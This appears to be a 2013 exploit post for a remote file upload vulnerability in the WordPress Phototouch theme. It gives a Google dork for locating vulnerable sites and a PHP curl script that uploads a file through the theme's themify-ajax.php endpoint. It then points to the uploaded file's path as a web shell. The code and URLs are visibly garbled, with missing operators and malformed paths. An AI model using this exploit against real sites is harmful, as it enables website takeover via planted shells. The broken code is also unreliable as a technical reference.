facebook facebook twitter rss

WordPress Phototouch-Theme Themes Remote File Upload Vulnerability

Author: Mr.JerK74 , Published: 25-12-2013
###################################################################################################
# Exploit Title: WordPress Phototouch-Theme Themes Remote File Upload Vulnerability
# Author: Mr.JerK74
# Date: 23/12/2013
# Vendor Homepage: http://themify.me/
# Themes Link: http://themify.me/themes/phototouch/
# Category: webapps
# Google dork: "/wp-content/themes/phototouch/"
# Tested on : Windows/Linux
# Facebook : fb.com/zdani76
###################################################################################################

[+]Exploitation[+]

<?php
$uploadfile
="upload.php";
$ch curl_init("http://127.0.0.1/wp-content/themes/phototouch/themify/themify-ajax.php?upload=1");
curl_setopt($chCURLOPT_POSTtrue);
curl_setopt($chCURLOPT_POSTFIELDS,
        array(
'orange_themes'=>"@$uploadfile"));
curl_setopt($chCURLOPT_RETURNTRANSFER1);
$postResult curl_exec($ch);
curl_close($ch);
print 
"$postResult";
?>


shell
http://127.0.01/wp-content/themesphototouch/uploads/yourfile.php

THANK TO :
[+] Mr.Al-Kaus4r [+] Ghack [+] tangerang6etar [+] Mr.JerK74 [+] Bayu_Santoso [+] Cgt_Evan [+] And ALL MY FRIEND :D [+]

Like us on Facebook :